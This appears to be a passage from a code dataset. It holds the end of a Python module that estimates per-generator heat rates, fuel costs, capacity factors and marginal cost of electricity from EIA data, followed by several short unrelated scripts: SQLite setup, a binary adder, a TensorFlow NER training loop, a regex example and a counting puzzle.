'generator_id'],\n right_on=['report_date',\n 'plant_id_eia',\n 'boiler_id'])\n bga_unassn.sort_values(['report_date', 'plant_id_eia'], inplace=True)\n bga_unassn['bga_source'] = None\n bga_unassn.loc[bga_unassn.boiler_id.notnull(),\n 'bga_source'] = 'string_assn'\n\n bga_compiled_2 = bga_assn.append(bga_unassn)\n bga_compiled_2.sort_values(['plant_id_eia', 'report_date'], inplace=True)\n bga_compiled_2['missing_from_923'].fillna(value=True, inplace=True)\n\n # Connect the gens and boilers in units\n bga_compiled_units = bga_compiled_2.loc[\n bga_compiled_2['unit_code'].notnull()]\n bga_gen_units = bga_compiled_units.drop(['boiler_id'], axis=1)\n bga_boil_units = bga_compiled_units[['plant_id_eia',\n 'report_date',\n 'boiler_id',\n 'unit_code']].copy()\n bga_boil_units.dropna(subset=['boiler_id'], inplace=True)\n\n # merge the units with the boilers\n bga_unit_compilation = bga_gen_units.merge(bga_boil_units,\n how='outer',\n on=['plant_id_eia',\n 'report_date',\n 'unit_code'],\n indicator=True)\n # label the bga_source\n bga_unit_compilation.
\\\n loc[bga_unit_compilation['bga_source'].isnull(),\n 'bga_source'] = 'unit_connection'\n bga_unit_compilation.drop(['_merge'], axis=1, inplace=True)\n bga_non_units = bga_compiled_2[bga_compiled_2['unit_code'].isnull()]\n\n # combine the unit compilation and the non units\n bga_compiled_3 = bga_non_units.append(bga_unit_compilation)\n\n # resort the records and the columns\n bga_compiled_3.sort_values(['plant_id_eia', 'report_date'], inplace=True)\n bga_compiled_3 = bga_compiled_3[['plant_id_eia',\n 'report_date',\n 'generator_id',\n 'boiler_id',\n 'unit_code',\n 'bga_source',\n 'net_generation_mwh',\n 'missing_from_923']]\n\n # label plants that have 'bad' generator records (generators that have MWhs\n # in gens9 but don't have connected boilers) create a df with just the bad\n # plants by searching for the 'bad' generators\n bad_plants = bga_compiled_3[(bga_compiled_3['boiler_id'].isnull()) &\n (bga_compiled_3['net_generation_mwh'] > 0)].\\\n drop_duplicates(subset=['plant_id_eia', 'report_date'])\n bad_plants = bad_plants[['plant_id_eia', 'report_date']]\n\n # merge the 'bad' plants back into the larger frame\n bga_compiled_3 = bga_compiled_3.merge(bad_plants,\n how='outer',\n on=['plant_id_eia', 'report_date'],\n indicator=True)\n\n # use the indicator to create labels\n bga_compiled_3['plant_w_bad_generator'] = \\\n np.where(bga_compiled_3._merge == 'both', True, False)\n # Note: At least one gen has reported MWh in 923, but could not be\n # programmatically mapped to a boiler\n\n # we don't need this one anymore\n bga_compiled_3 = bga_compiled_3.drop(['_merge'], axis=1)\n\n # create a label for generators that are unmapped but in 923\n bga_compiled_3['unmapped_but_in_923'] = \\\n np.where((bga_compiled_3.boiler_id.isnull()) &\n ~bga_compiled_3.missing_from_923 &\n (bga_compiled_3.net_generation_mwh == 0),\n True,\n False)\n\n # create a label for generators that are unmapped\n bga_compiled_3['unmapped'] = np.where(bga_compiled_3.boiler_id.isnull(),\n True,\n False)\n bga_compiled_3 = bga_compiled_3.drop('net_generation_mwh', axis=1)\n bga_compiled_3.loc[bga_compiled_3.unit_code.isnull(), 'unit_code'] = None\n return(bga_compiled_3)\n\n\ndef heat_rate(bga, gen_eia923, bf_eia923, gens_eia860, min_heat_rate=5.5):\n \"\"\"Calculate heat rates (mmBTU/MWh) within separable generation units.\"\"\"\n generation_w_boilers = \\\n analysis.merge_on_date_year(gen_eia923, bga, how='left',\n on=['plant_id_eia', 'generator_id'])\n\n # Calculate net generation from all generators associated with each boiler\n gb1 = generation_w_boilers.groupby(\n by=['plant_id_eia', 'report_date', 'boiler_id'])\n gen_by_boiler = gb1.net_generation_mwh.sum().to_frame().reset_index()\n gen_by_boiler.rename(\n columns={'net_generation_mwh': 'net_generation_mwh_boiler'},\n inplace=True)\n\n # Calculate net generation per unique boiler generator combo\n gb2 = generation_w_boilers.groupby(\n by=['plant_id_eia', 'report_date', 'boiler_id', 'generator_id'])\n gen_by_bg = gb2.net_generation_mwh.sum().to_frame().reset_index()\n gen_by_bg.rename(\n columns={'net_generation_mwh': 'net_generation_mwh_boiler_gen'},\n inplace=True)\n\n # squish them together\n gen_by_bg_and_boiler = \\\n pd.merge(gen_by_boiler, gen_by_bg,\n on=['plant_id_eia', 'report_date', 'boiler_id'], how='left')\n\n # Bring in boiler fuel consumption and boiler generator associations\n bg = analysis.merge_on_date_year(bf_eia923, bga, how='left',\n on=['plant_id_eia', 'boiler_id'])\n # Merge boiler fuel consumption in with our per-boiler and boiler\n # 
generator combo net generation calculations\n bg = pd.merge(bg, gen_by_bg_and_boiler, how='left',\n on=['plant_id_eia', 'report_date',\n 'boiler_id', 'generator_id'])\n\n # Use the proportion of the generation of each generator to allot mmBTU\n bg['proportion_of_gen_by_boil_gen'] = \\\n bg['net_generation_mwh_boiler_gen'] / bg['net_generation_mwh_boiler']\n bg['fuel_consumed_mmbtu_generator'] = \\\n bg['proportion_of_gen_by_boil_gen'] * bg['total_heat_content_mmbtu']\n\n # Generators with no generation and no associated fuel consumption result\n # in some 0/0 = NaN values, which propagate when summed. For our purposes\n # they should be set to zero, since those generators are contributing\n # nothing to either the fuel consumed or the proportion of net generation.\n bg['proportion_of_gen_by_boil_gen'] = \\\n bg.proportion_of_gen_by_boil_gen.fillna(0)\n bg['fuel_consumed_mmbtu_generator'] = \\\n bg.fuel_consumed_mmbtu_generator.fillna(0)\n\n # Get total heat consumed per time period by each generator.\n # Before this, the bg dataframe has multiple records for each generator\n # when there are multiple boilers associated with each generator. This step\n # collapses the boiler-level data into generators to be compared to the\n # generator-level net generation.\n bg_gb = bg.groupby(by=['plant_id_eia', 'report_date', 'generator_id'])\n bg = bg_gb.fuel_consumed_mmbtu_generator.sum().to_frame().reset_index()\n # Now that we have the fuel consumed per generator, bring the net\n # generation per generator back in:\n hr = pd.merge(bg, gen_eia923, how='left',\n on=['plant_id_eia', 'report_date', 'generator_id'])\n # Finally, calculate heat rate\n hr['heat_rate_mmbtu_mwh'] = \\\n hr['fuel_consumed_mmbtu_generator'] / \\\n hr['net_generation_mwh']\n\n # Importing the plant association tag to filter out the\n # generators that are a part of plants that aren't in the bga table\n gens = gens_with_bga(bga, gen_eia923)\n # This is a per-generator table now -- so we don't want the boiler_id\n # And we only want the ones with complete associations.\n gens_assn = gens[gens['complete_assn']].drop('boiler_id', axis=1)\n gens_assn = gens_assn.drop_duplicates(subset=['plant_id_eia',\n 'generator_id',\n 'report_date'])\n hr = pd.merge(hr, gens_assn,\n on=['plant_id_eia', 'report_date', 'generator_id'])\n\n # Only keep the generators with reasonable heat rates\n hr = hr[hr.heat_rate_mmbtu_mwh >= min_heat_rate]\n\n hr = analysis.merge_on_date_year(\n hr,\n gens_eia860[['report_date', 'plant_id_eia', 'generator_id',\n 'fuel_type_pudl', 'fuel_type_count']],\n how='inner', on=['plant_id_eia', 'generator_id'])\n\n # Sort it a bit and clean up some types\n first_cols = [\n 'report_date',\n 'operator_id',\n 'operator_name',\n 'plant_id_eia',\n 'plant_name',\n 'generator_id'\n ]\n hr = outputs.organize_cols(hr, first_cols)\n hr['util_id_pudl'] = hr.util_id_pudl.astype(int)\n hr['operator_id'] = hr.operator_id.astype(int)\n hr = hr.sort_values(by=['operator_id', 'plant_id_eia',\n 'generator_id', 'report_date'])\n return(hr)\n
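\n\n# Worked example of the allocation above (made-up numbers): if one boiler\n# burned 1,000 mmBTU and its two generators produced 60 MWh and 40 MWh, their\n# proportions are 0.6 and 0.4, so they are allotted 600 and 400 mmBTU, and the\n# first generator's heat rate is 600 / 60 = 10 mmBTU/MWh.\n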
\n\ndef fuel_cost(hr, frc_eia923, gen_eia923):\n \"\"\"\n Calculate fuel costs per MWh on a per generator basis for MCOE.\n\n Fuel costs are reported on a per-plant basis, but we want to estimate them\n at the generator level. This is complicated by the fact that some plants\n have several different types of generators, using different fuels. We have\n fuel costs broken out by type of fuel (coal, oil, gas), and we know which\n generators use which fuel based on their energy_source code and reported\n prime_mover. Coal plants use a little bit of natural gas or diesel to get\n started, but based on our analysis of the \"pure\" coal plants, this amounts\n to only a fraction of a percent of their overall fuel consumption on a\n heat content basis, so we're ignoring it for now.\n\n For plants whose generators all rely on the same fuel source, we simply\n attribute the fuel costs in proportion to the fuel heat content consumption\n associated with each generator.\n\n For plants with more than one type of generator energy source, we need to\n split out the fuel costs according to fuel type -- so the gas fuel costs\n are associated with generators that have energy_source gas, and the coal\n fuel costs are associated with the generators that have energy_source coal.\n \"\"\"\n # Split up the plants on the basis of how many different primary energy\n # sources the component generators have:\n gen_w_ft = pd.merge(gen_eia923,\n hr[['plant_id_eia', 'report_date', 'generator_id',\n 'fuel_type_pudl', 'fuel_type_count',\n 'heat_rate_mmbtu_mwh']],\n how='inner',\n on=['plant_id_eia', 'report_date', 'generator_id'])\n\n one_fuel = gen_w_ft[gen_w_ft.fuel_type_count == 1]\n multi_fuel = gen_w_ft[gen_w_ft.fuel_type_count > 1]\n\n # Bring the single fuel cost & generation information together for just\n # the one fuel plants:\n one_fuel = pd.merge(one_fuel, frc_eia923[['plant_id_eia', 'report_date',\n 'fuel_cost_per_mmbtu',\n 'fuel_type_pudl',\n 'total_fuel_cost',\n 'total_heat_content_mmbtu']],\n how='left', on=['plant_id_eia', 'report_date'])\n # We need to retain the different energy_source information from the\n # generators (primary for the generator) and the fuel receipts (which is\n # per-delivery), and in the one_fuel case, there will only be a single\n # generator getting all of the fuels:\n one_fuel.rename(columns={'fuel_type_pudl_x': 'ftp_gen',\n 'fuel_type_pudl_y': 'ftp_frc'},\n inplace=True)\n\n # Do the same thing for the multi fuel plants, but also merge based on\n # the different fuel types within the plant, so that we keep that info\n # as separate records:\n multi_fuel = pd.merge(multi_fuel,\n frc_eia923[['plant_id_eia', 'report_date',\n 'fuel_cost_per_mmbtu',\n 'fuel_type_pudl']],\n how='left', on=['plant_id_eia', 'report_date',\n 'fuel_type_pudl'])\n\n # At this point, within each plant, we should have one record per\n # combination of generator & fuel type, which includes the heat rate of\n # each generator, as well as *plant* level fuel cost per unit heat input\n # for *each* fuel, which we can combine to figure out the fuel cost per\n # unit net electricity generation on a generator basis.\n\n # We have to do these calculations separately for the single and multi-fuel\n # plants because in the case of the one fuel plants we need to sum up all\n # of the fuel costs -- including both primary and secondary fuel\n # consumption -- whereas in the multi-fuel plants we are going to look at\n # fuel costs on a per-fuel basis (this is very close to being correct,\n # since secondary fuels are typically a fraction of a percent of the\n # plant's overall costs).\n\n one_fuel_gb = one_fuel.groupby(by=['report_date', 'plant_id_eia'])\n one_fuel_agg = one_fuel_gb.agg({\n 'total_fuel_cost': np.sum,\n 'total_heat_content_mmbtu': np.sum\n })\n
 one_fuel_agg['fuel_cost_per_mmbtu'] = \\\n one_fuel_agg['total_fuel_cost'] / \\\n one_fuel_agg['total_heat_content_mmbtu']\n one_fuel_agg = one_fuel_agg.reset_index()\n one_fuel = pd.merge(one_fuel[['plant_id_eia', 'report_date',\n 'generator_id', 'heat_rate_mmbtu_mwh']],\n one_fuel_agg[['plant_id_eia', 'report_date',\n 'fuel_cost_per_mmbtu']],\n on=['plant_id_eia', 'report_date'])\n one_fuel = one_fuel.drop_duplicates(\n subset=['plant_id_eia', 'report_date', 'generator_id'])\n\n multi_fuel = multi_fuel[['plant_id_eia', 'report_date', 'generator_id',\n 'fuel_cost_per_mmbtu', 'heat_rate_mmbtu_mwh']]\n\n fuel_cost = one_fuel.append(multi_fuel)\n fuel_cost['fuel_cost_per_mwh'] = \\\n fuel_cost['fuel_cost_per_mmbtu'] * fuel_cost['heat_rate_mmbtu_mwh']\n fuel_cost = \\\n fuel_cost.sort_values(['report_date', 'plant_id_eia', 'generator_id'])\n\n out_df = gen_w_ft.drop('heat_rate_mmbtu_mwh', axis=1)\n out_df = pd.merge(out_df.drop_duplicates(), fuel_cost,\n on=['report_date', 'plant_id_eia', 'generator_id'])\n\n return(out_df)\n\n\ndef capacity_factor(gens_eia860, gen_eia923, min_cap_fact=0, max_cap_fact=1.5):\n \"\"\"\n Calculate the capacity factor for each generator.\n\n Capacity Factor is calculated by using the net generation from eia923 and\n the nameplate capacity from eia860. The net gen and capacity are pulled\n into one dataframe, then the dates from that dataframe are pulled out to\n determine the hours in each period based on the frequency. The number of\n hours is used in calculating the capacity factor. Then the 'bad' records\n are dropped.\n \"\"\"\n # infer the natural frequency of our input dataset:\n freq = pd.infer_freq(\n pd.DatetimeIndex(gen_eia923.report_date.unique()).sort_values()\n )\n # Only include columns to be used\n gens_eia860 = gens_eia860[['plant_id_eia',\n 'report_date',\n 'generator_id',\n 'nameplate_capacity_mw']]\n gen_eia923 = gen_eia923[['plant_id_eia',\n 'report_date',\n 'generator_id',\n 'net_generation_mwh']]\n\n # merge the generation and capacity to calculate capacity factor\n capacity_factor = analysis.merge_on_date_year(gen_eia923,\n gens_eia860,\n on=['plant_id_eia',\n 'generator_id'])\n\n # get a unique set of dates to generate the number of hours\n dates = capacity_factor['report_date'].drop_duplicates()\n dates_to_hours = pd.DataFrame(\n data={'report_date': dates,\n 'hours': dates.apply(lambda d: (pd.date_range(d, periods=2,\n freq=freq)[1] -\n pd.date_range(d, periods=2,\n freq=freq)[0]) /\n pd.Timedelta(hours=1))})\n\n # merge in the hours for the calculation\n capacity_factor = capacity_factor.merge(dates_to_hours, on=['report_date'])\n\n # calculate the capacity factor: net generation over capacity times hours\n capacity_factor['capacity_factor'] = \\\n capacity_factor['net_generation_mwh'] / \\\n (capacity_factor['nameplate_capacity_mw'] * capacity_factor['hours'])\n\n # Replace unrealistic capacity factors with NaN\n capacity_factor.loc[capacity_factor['capacity_factor']\n < min_cap_fact, 'capacity_factor'] = np.nan\n capacity_factor.loc[capacity_factor['capacity_factor']\n >= max_cap_fact, 'capacity_factor'] = np.nan\n\n # drop the hours column, since we don't need it anymore\n capacity_factor.drop(['hours'], axis=1, inplace=True)\n\n return(capacity_factor)\n
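\n\n# Quick numeric check of the formula above (illustrative): a 100 MW unit that\n# generates 350,400 MWh over a year (8,760 hours) has a capacity factor of\n# 350400 / (100 * 8760) = 0.4.\n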
\n\ndef mcoe(freq='AS', testing=False,\n start_date=None, end_date=None,\n min_heat_rate=5.5, min_cap_fact=0.0, max_cap_fact=1.5,\n output=None, debug=False):\n \"\"\"\n Compile marginal cost of electricity (MCOE) at the generator level.\n\n Use data from EIA 923, EIA 860, and (eventually) FERC Form 1 to estimate\n the MCOE of individual generating units. By default, this is done at\n annual resolution, since the FERC Form 1 data is annual. Perform the\n calculation for time periods between start_date and end_date. If those\n dates aren't given, then perform the calculation across all of the years\n for which the EIA 923 data is available.\n\n Args:\n freq: String indicating time resolution on which to calculate MCOE.\n start_date: beginning of the date range to calculate MCOE within.\n end_date: end of the date range to calculate MCOE within.\n output: path to output CSV to. No output if None.\n min_heat_rate: lowest plausible heat rate, in mmBTU/MWh.\n min_cap_fact, max_cap_fact: bounds on plausible capacity factors.\n testing: use the test database if True.\n\n Returns:\n mcoe: a dataframe organized by date and generator, with lots of juicy\n information about MCOE.\n\n Issues:\n - Start and end dates outside of the EIA860 valid range don't seem to\n result in additional EIA860 data being synthesized and returned.\n - Merge annual data with other time resolutions.\n \"\"\"\n # If we haven't been given start & end dates, use the full extent of\n # the EIA923 data:\n if start_date is None:\n start_date = \\\n pd.to_datetime('{}-01-01'.format(min(pc.working_years['eia923'])))\n else:\n # Make sure it's a date... and not a string.\n start_date = pd.to_datetime(start_date)\n if end_date is None:\n end_date = \\\n pd.to_datetime('{}-12-31'.format(max(pc.working_years['eia923'])))\n else:\n # Make sure it's a date... and not a string.\n end_date = pd.to_datetime(end_date)\n\n # Select the required data from the database:\n # Generation:\n gen_eia923 = outputs.generation_eia923(freq=freq, testing=testing,\n start_date=start_date,\n end_date=end_date)\n # Boiler Fuel Consumption:\n bf_eia923 = outputs.boiler_fuel_eia923(freq=freq, testing=testing,\n start_date=start_date,\n end_date=end_date)\n # Grab information about the individual generators:\n gens_eia860 = outputs.generators_eia860(testing=testing,\n start_date=start_date,\n end_date=end_date)\n # The proto-BGA:\n bga_eia860 = outputs.boiler_generator_assn_eia860(testing=testing,\n start_date=start_date,\n end_date=end_date)\n # The Boiler - Generator Associations:\n bga = boiler_generator_association(bga_eia860, gens_eia860,\n gen_eia923, bf_eia923,\n start_date=start_date,\n end_date=end_date,\n testing=testing)\n\n # Remove all associations tagged as bad for one reason or another\n bga_good = bga[~bga.missing_from_923 &\n ~bga.plant_w_bad_generator &\n ~bga.unmapped_but_in_923 &\n ~bga.unmapped]\n\n bga_good = bga_good.drop(['missing_from_923',\n 'plant_w_bad_generator',\n 'unmapped_but_in_923',\n 'unmapped'], axis=1)\n bga_good = bga_good.drop_duplicates(subset=['report_date', 'plant_id_eia',\n 'boiler_id', 'generator_id'])\n # Now, calculate the heat_rates on a per-generator basis:\n hr = heat_rate(bga_good, gen_eia923, bf_eia923, gens_eia860,\n min_heat_rate=min_heat_rate)\n\n frc_eia923 = outputs.fuel_receipts_costs_eia923(freq=freq, testing=testing,\n start_date=start_date,\n end_date=end_date)\n # Calculate fuel costs by generator\n fc = fuel_cost(hr, frc_eia923, gen_eia923)\n # Calculate capacity factors by generator\n cf = capacity_factor(gens_eia860, gen_eia923,\n min_cap_fact=min_cap_fact,\n max_cap_fact=max_cap_fact)\n # Compile the above into a single dataframe for output/return.\n mcoe_out = pd.merge(fc,\n cf[['report_date', 'plant_id_eia',\n 'generator_id', 'capacity_factor']],\n on=['report_date', 'plant_id_eia', 'generator_id'],\n how='left')\n\n return(mcoe_out)\n\n\ndef single_gens(df, key_cols=['report_date', 
'plant_id_eia', 'generator_id']):\n \"\"\"Test whether dataframe has a single record per generator.\"\"\"\n len_1 = len(df)\n len_2 = len(df.drop_duplicates(subset=key_cols))\n # unique iff dropping duplicates removes nothing\n return len_1 == len_2\n\n\ndef nonunique_gens(df,\n key_cols=['plant_id_eia', 'generator_id', 'report_date']):\n \"\"\"Generate a list of all the non-unique generator records for testing.\"\"\"\n unique_gens = df.drop_duplicates(subset=key_cols)\n dupes = df[~df.isin(unique_gens)].dropna()\n dupes = dupes.sort_values(by=key_cols)\n return(dupes)\n","sub_path":"pudl/mcoe.py","file_name":"mcoe.py","file_ext":"py","file_size_in_byte":32085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"410898982","text":"import sqlite3\r\nfrom sqlite3 import Error\r\n\r\n\r\ndef main():\r\n database = \"C:/Users/Matt/PycharmProjects/MeditationLog/MeditationData.db\"\r\n\r\n sql_create_sessions_table = \"\"\" CREATE TABLE IF NOT EXISTS sessions (\r\n id integer PRIMARY KEY autoincrement,\r\n session_begin datetime,\r\n session_end datetime,\r\n notes text\r\n ); \"\"\"\r\n\r\n # create a database connection\r\n conn = create_connection(database)\r\n if conn is not None:\r\n # create sessions table\r\n create_table(conn, sql_create_sessions_table)\r\n\r\n else:\r\n print(\"Error! cannot create the database connection.\")\r\n\r\n\r\ndef create_connection(db_file):\r\n \"\"\" create a database connection to the SQLite database\r\n specified by db_file\r\n :param db_file: database file\r\n :return: Connection object or None\r\n \"\"\"\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n return conn\r\n except Error as e:\r\n print(e)\r\n\r\n return None\r\n\r\n\r\ndef create_table(conn, create_table_sql):\r\n \"\"\" create a table from the create_table_sql statement\r\n :param conn: Connection object\r\n :param create_table_sql: a CREATE TABLE statement\r\n :return:\r\n \"\"\"\r\n try:\r\n c = conn.cursor()\r\n c.execute(create_table_sql)\r\n except Error as e:\r\n print(e)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n","sub_path":"create_database.py","file_name":"create_database.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"155963694","text":"\"\"\" Program to add 2 binary numbers\"\"\"\n\ndef binary_adder(num1, num2):\n \"\"\"\n input - num1 type(integer) - the first binary number to add\n num2 type(integer) - the second binary number to add\n\n output - type(integer) - the sum of both numbers in binary form\n \"\"\"\n\n def base_2_converter(num):\n \"\"\" function to convert a binary number to base 10\"\"\"\n # This works by using the mathematical formula (x * (2 ** 2)) + (y * (2 ** 1)) + (z * (2 ** 0)) where xyz are digits of a binary number\n base_10 = sum((int(j) * (2 ** i) for i, j in enumerate(str(num)[::-1])))\n return base_10\n\n def base_10_converter(num):\n \"\"\" function to convert base 10 number to binary\"\"\"\n # this works by dividing the number by 2 and storing its remainder and reversing that to get the binary number\n if num == 0:\n # guard: the loop below never terminates for 0\n return 0\n base_raw = \"\"\n while num != 1:\n base_raw += str(num % 2)\n num //= 2\n return int((base_raw + \"1\")[::-1])\n\n # first convert both numbers to base 10\n num1 = base_2_converter(num1)\n num2 = base_2_converter(num2)\n\n # add both numbers in base 10\n num = num1 + num2\n\n # convert back to base 2, e.g. 10 + 1 -> 2 + 1 = 3 -> 11\n binary = base_10_converter(num)\n\n return binary\n\nprint(binary_adder(10, 
1))\n","sub_path":"gov/assets/img/uploads/documents/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"74068572","text":"import sys\nsys.path.append(\"../\")\nimport pickle\nfrom Config.config import config\nimport tensorflow as tf\nfrom model.Transformer_NER import Encoder\nfrom DataLoader.bucket_and_batch import bucket_and_batch\nsys.path.append(\"../../\")\nfrom utils.eval import eval\nimport numpy as np\nimport math\nimport string\nimport random\n\n\nbnb = bucket_and_batch()\neval = eval()\n\nhyperparameters = config['CoNLL2003_Hyperparameters']\n\nval_batch_tokens = 64\ntrain_batch_tokens = 64\n\nmax_iterations = 1000\n\ndim = hyperparameters['dim']\n\nwith open('../Processed_Data/CoNLL_NER_2003.pkl', 'rb') as fp:\n data = pickle.load(fp)\n\ntags2idx = data['tags2idx']\ntrain_text = data['train_text']\ntrain_tags = data['train_tags']\nval_text = data['val_text']\nval_tags = data['val_tags']\nvocab2idx = data['vocab2idx']\nembd = data['embd']\n\nidx2vocab = {v: k for k, v in vocab2idx.items()}\n\ntf_text = tf.placeholder(tf.int32, [None, None])\ntf_labels = tf.placeholder(tf.int32, [None, None])\ntf_true_seq_lens = tf.placeholder(tf.int32, [None])\ntf_train = tf.placeholder(tf.bool)\ntf_learning_rate = tf.placeholder(tf.float32)\n\nlabels2idx = tags2idx\nidx2labels = {v: k for k, v in labels2idx.items()}\n\nclass_weights = [1.0 for tag in tags2idx]\nclass_weights[labels2idx['O']] = 1.0\n\n\nmodel = Encoder(config_key='CoNLL2003_Hyperparameters',\n text=tf_text,\n labels=tf_labels,\n dim=300,\n tags_size=len(labels2idx),\n true_seq_len=tf_true_seq_lens,\n train=tf_train,\n learning_rate=tf_learning_rate,\n word_embeddings=embd,\n class_weights=class_weights)\n\n\nparameter_count = np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])\nprint(\"\\n\\nNumber of Parameters: {}\\n\\n\".format(parameter_count))\n\n\nepochs = 100\n\nwith tf.Session() as sess: # Start Tensorflow Session\n\n val_batches_source, val_batches_labels, val_batches_true_seq_lens = bnb.bucket_and_batch(\n val_text, val_tags, vocab2idx, labels2idx, val_batch_tokens)\n\n print(\"Validation batches loaded\")\n\n train_batches_source, train_batches_labels, train_batches_true_seq_lens = bnb.bucket_and_batch(\n train_text, train_tags, vocab2idx, labels2idx, train_batch_tokens)\n\n print(\"Train batches loaded\")\n\n display_step = 100\n patience = hyperparameters['patience']\n\n load = 'n' # input(\"\\nLoad checkpoint? 
y/n: \")\n print(\"\")\n\n filtered_var_list = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)\n saver = tf.train.Saver(var_list=filtered_var_list)\n\n if load.lower() == 'y':\n\n print('Loading pre-trained weights for the model...')\n\n saver.restore(sess, '../Model_Backup/Transformer/Transformer.ckpt')\n sess.run(tf.global_variables())\n sess.run(tf.tables_initializer())\n\n with open('../Model_Backup/Transformer/Transformer.pkl', 'rb') as fp:\n train_data = pickle.load(fp)\n\n epochs_covered = train_data['epochs_covered']\n best_loss = train_data['best_loss']\n best_F1 = train_data['best_F1']\n impatience = train_data['impatience']\n steps = train_data['steps']\n train_losses = train_data['train_losses']\n val_losses = train_data['val_losses']\n train_F1s = train_data['train_F1s']\n val_F1s = train_data['val_F1s']\n\n print('\\nRESTORATION COMPLETE\\n')\n\n else:\n\n epochs_covered = 0\n best_loss = math.inf\n best_F1 = -math.inf\n impatience = 0\n steps = 1\n train_losses = []\n train_F1s = []\n val_losses = []\n val_F1s = []\n\n init = tf.global_variables_initializer()\n sess.run(init)\n sess.run(tf.tables_initializer())\n\n for epoch in range(epochs_covered, epochs):\n\n batches_indices = [i for i in range(0, len(train_batches_source))]\n random.shuffle(batches_indices)\n\n total_train_loss = 0\n total_tp = 0\n total_pred_len = 0\n total_gold_len = 0\n\n for i in range(0, min(1000, len(train_batches_source))):\n\n #warmup_steps = 4000\n #lrate = (dim**(-.5))*min(steps**(-0.5), steps*(warmup_steps**(-1.5)))\n\n lrate = hyperparameters['lrate']\n\n j = int(batches_indices[i])\n\n cost, prediction,\\\n _ = sess.run([model.display_loss,\n model.predictions,\n model.train_ops],\n feed_dict={tf_text: train_batches_source[j],\n tf_labels: train_batches_labels[j],\n tf_true_seq_lens: train_batches_true_seq_lens[j],\n tf_train: True,\n tf_learning_rate: lrate})\n\n steps += 1\n\n tp, pred_len, gold_len = eval.stats(train_batches_labels[j],\n prediction,\n train_batches_true_seq_lens[j],\n idx2labels)\n\n total_tp += tp\n total_pred_len += pred_len\n total_gold_len += gold_len\n total_train_loss += cost\n\n _, _, F1 = eval.F1(tp, pred_len, gold_len)\n\n if i % display_step == 0:\n\n print(\"Iter \"+str(i)+\", Cost = \" +\n \"{:.3f}\".format(cost)+\", F1 = \" +\n \"{:.3f}\".format(F1))\n\n _, _, train_F1 = eval.F1(total_tp, total_pred_len, total_gold_len)\n\n train_F1s.append(train_F1)\n train_len = len(train_batches_source)\n train_losses.append(total_train_loss/train_len)\n\n print(\"\\n\\n\")\n\n total_val_cost = 0\n total_tp = 0\n total_pred_len = 0\n total_gold_len = 0\n\n for i in range(0, len(val_batches_source)):\n\n if (i+1) % 100 == 0:\n print(\"Validating Batch {}\".format(i+1))\n\n cost, prediction,\\\n acc = sess.run([model.display_loss,\n model.predictions,\n model.accuracy],\n feed_dict={tf_text: val_batches_source[i],\n tf_labels: val_batches_labels[i],\n tf_true_seq_lens: val_batches_true_seq_lens[i],\n tf_train: False})\n\n tp, pred_len, gold_len = eval.stats(val_batches_labels[i],\n prediction,\n val_batches_true_seq_lens[i],\n idx2labels)\n\n total_tp += tp\n total_pred_len += pred_len\n total_gold_len += gold_len\n total_val_cost += cost\n\n _, _, val_F1 = eval.F1(total_tp, total_pred_len, total_gold_len)\n\n val_len = len(val_batches_source)\n\n avg_val_cost = total_val_cost/val_len\n\n val_F1s.append(val_F1)\n val_losses.append(avg_val_cost)\n\n print(\"\\n\\nVALIDATION\\n\\n\")\n\n print(\"Epoch \" + str(epoch) + \", Validation Loss= \" +\n 
\"{:.3f}\".format(avg_val_cost) + \", Validation F1= \" +\n \"{:.3f}\".format(val_F1))\n\n flag = 0\n impatience += 1\n\n if avg_val_cost < best_loss:\n\n impatience = 0\n\n best_loss = avg_val_cost\n\n if val_F1 >= best_F1:\n\n impatience = 0\n\n best_F1 = val_F1\n\n flag = 1\n\n if flag == 1:\n\n saver.save(sess, '../Model_Backup/Transformer/Transformer.ckpt')\n\n PICKLE_dict = {'epochs_covered': epoch+epochs_covered+1,\n 'best_loss': best_loss,\n 'best_F1': best_F1,\n 'impatience': impatience,\n 'steps': steps,\n 'train_losses': train_losses,\n 'val_losses': val_losses,\n 'train_F1s': train_F1s,\n 'val_F1s': val_F1s}\n\n with open('../Model_Backup/Transformer/Transformer.pkl', 'wb') as fp:\n pickle.dump(PICKLE_dict, fp)\n\n print(\"Checkpoint created!\")\n\n print(\"\\n\")\n\n if impatience > patience:\n break\n","sub_path":"CoNLL2003/Train/Transformer_train.py","file_name":"Transformer_train.py","file_ext":"py","file_size_in_byte":8381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"128087186","text":"# \\A\tReturns a match if the specified characters are at the beginning of the string\t\"\\AThe\"\nimport re\n\ntxt = \"The car is in black colour\"\n\n#Check if the string starts with \"The\":\n\nx = re.findall(\"\\AThe\", txt)\n\nprint(x)\n\nif x:\n print(\"Yes, there is a match!\")\nelse:\n print(\"No match\")\n","sub_path":"Python_RegEx/SpecialSequences.py/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"347132824","text":"import sys\nsys.stdin = open(\"원안의사각형_input.txt\")\n\nN = int(input())\nres=0\nfor i in range(N-1, -1, -1):\n for j in range(1, N+1):\n square = (i**2 + j**2)**0.5\n # print(square, j)\n if N < square:\n res += j-1\n break\nres *= 4\nprint(res)\n\n# 3137548","sub_path":"codeXpert/0304월요일/원안의사각형.py","file_name":"원안의사각형.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"352257288","text":"#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*- \n\n# from collections import named tuple module.\nfrom collections import namedtuple\n# import random module\nimport random\n# import regex module\nimport re\n# import system module\nimport sys\n# import pokemon types module\nfrom pokemon_types import *\n\n########################\n### File information ###\n########################\n\n__author__ = \"Lindsay Gelle (https://github.com/gellel)\"\n\n__version__ = \"1.0\"\n\n__all__ = 
